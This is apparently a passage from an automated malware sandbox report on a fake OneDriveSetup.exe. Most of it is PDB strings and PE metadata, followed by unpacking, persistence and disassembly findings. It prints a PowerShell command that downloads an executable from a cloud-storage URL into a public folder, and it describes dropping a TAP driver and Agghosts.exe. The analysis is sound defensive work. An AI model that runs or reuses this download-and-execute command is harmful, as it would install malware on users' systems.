                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: bin.exe, 00000017.00000003.1642153652.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: bin.exe, 00000017.00000003.1549496484.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: bin.exe, 00000017.00000003.1612912138.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: bin.exe, 00000017.00000003.1622971525.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: bin.exe, 00000017.00000003.1572509011.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: bin.exe, 00000017.00000003.1614187153.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: bin.exe, 00000017.00000003.1603538546.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1601628106.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: bin.exe, 00000017.00000003.1610160975.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: bin.exe, 00000017.00000003.1629944717.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: bin.exe, 00000017.00000003.1595260385.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: bin.exe, 00000017.00000003.1566361355.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb source: bin.exe, 00000017.00000003.1678131607.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netstandard.pdb.mdb source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1508105244.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\build\xra_common\webview_3497\Release_tjfuyun\webview.pdb source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1607566852.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: bin.exe, 00000017.00000003.1571122939.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: bin.exe, 00000017.00000003.1602379822.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: bin.exe, 00000017.00000003.1639573458.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: bin.exe, 00000017.00000003.1581060305.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: bin.exe, 00000017.00000003.1641668329.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: bin.exe, 00000017.00000003.1684160118.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682444557.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683307184.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1666138359.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1669868707.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1678000606.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1612762848.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1678751411.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1676498928.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1568171623.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1885521177.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1561026900.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675026731.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1570947440.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1612052281.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1609523671.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1616041410.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1664820906.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1605841488.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547261671.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1661756361.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1959010557.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604051077.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1603379584.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1666893107.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1602218207.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1606874509.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1665493869.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619189971.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673266845.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1672033946.00000000
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: bin.exe, 00000017.00000003.1620645331.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: bin.exe, 00000017.00000003.1589104804.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: bin.exe, 00000017.00000003.1545410871.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: bin.exe, 00000017.00000003.1617348748.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: bin.exe, 00000017.00000003.1535471188.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: bin.exe, 00000017.00000003.1512120926.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: bin.exe, 00000017.00000003.1531102979.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1617972564.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1551600625.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: bin.exe, 00000017.00000003.1569651251.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: bin.exe, 00000017.00000003.1646188460.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: bin.exe, 00000017.00000003.1616704287.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: bin.exe, 00000017.00000003.1551101243.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: bin.exe, 00000017.00000003.1589953846.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: bin.exe, 00000017.00000003.1642655283.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: bin.exe, 00000017.00000003.1633728741.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: bin.exe, 00000017.00000003.1536326659.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: bin.exe, 00000017.00000003.1593483290.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: bin.exe, 00000017.00000003.1615509654.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: bin.exe, 00000017.00000003.1629430171.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: bin.exe, 00000017.00000003.1565839959.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: bin.exe, 00000017.00000003.1538662280.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: bin.exe, 00000017.00000003.1544903906.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: bin.exe, 00000017.00000003.1579218741.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: bin.exe, 00000017.00000003.1568304896.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: bin.exe, 00000017.00000003.1529710100.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001D.00000000.1811026709.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001D.00000002.1813119826.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000002.1855324120.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000000.1813487867.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.1856420036.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.1857742975.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: bin.exe, 00000017.00000003.1577151692.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: bin.exe, 00000017.00000003.1605485031.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: bin.exe, 00000017.00000003.1597283206.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: bin.exe, 00000017.00000003.1558254585.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: bin.exe, 00000017.00000003.1598931157.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: F:\dbs\sh\odct\0201_092045\client\onedrive\Setup\standalone\exe\obj\amd64\OneDriveSetup.pdb source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1570344266.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: bin.exe, 00000017.00000003.1612215932.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: bin.exe, 00000017.00000003.1583783784.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: bin.exe, 00000017.00000003.1574773739.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                Detected unpacking (creates a PE file in dynamic memory)
                Source: C:\Users\user\Desktop\OneDriveSetup.exeUnpacked PE file: 0.2.OneDriveSetup.exe.140000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeUnpacked PE file: 9.2.Agghosts.exe.10000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeUnpacked PE file: 24.2.Agghosts.exe.10000000.2.unpack
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"Jump to behavior
                Source: System.Web.Services.Description.resources.dll.23.drStatic PE information: 0x98399BEE [Tue Dec 6 04:05:02 2050 UTC]
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666F14 GetFileVersionInfoSizeW,GetFileVersionInfoW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,VerQueryValueW,VerQueryValueW,VerQueryValueW,RegQueryValueExW,RegCloseKey,9_2_00666F14
                Source: OneDriveSetup.exeStatic PE information: section name: .didat
                Source: OneDriveSetup.exeStatic PE information: section name: _RDATA
                Source: Agghosts.exe.0.drStatic PE information: section name: .00cfg
                Source: e_sqlite3.dll0.23.drStatic PE information: section name: _RDATA
                Source: WebView2Loader.dll.23.drStatic PE information: section name: .00cfg
                Source: WebView2Loader.dll.23.drStatic PE information: section name: _RDATA
                Source: WebView2Loader.dll0.23.drStatic PE information: section name: .00cfg
                Source: WebView2Loader.dll0.23.drStatic PE information: section name: .voltbl
                Source: ndp462-web.exe.23.drStatic PE information: section name: .boxld01
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066240A push ecx; mov dword ptr [esp], 46040000h9_2_006D5B44
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666AC8 push ecx; mov dword ptr [esp], 46040000h9_2_006D5CF1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_10009EA5 push ecx; ret 9_2_10009EB8
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_10009EA5 push ecx; ret 24_2_10009EB8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF5DD0 push esp; ret 25_2_04BF5DE3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF1ABC push cs; retf 25_2_04BF1AD3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF1AC4 push cs; retf 25_2_04BF1AD3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF1B35 push ds; retf 25_2_04BF1B3B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08CA5818 push edx; retf A008h25_2_08CA57CE
                Source: e_sqlite3.dll.23.drStatic PE information: section name: .text entropy: 7.128615396301837

                Persistence and Installation Behavior

                barindex
                Sample is not signed and drops a device driver
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to behavior
                Tries to download and execute files (via powershell)
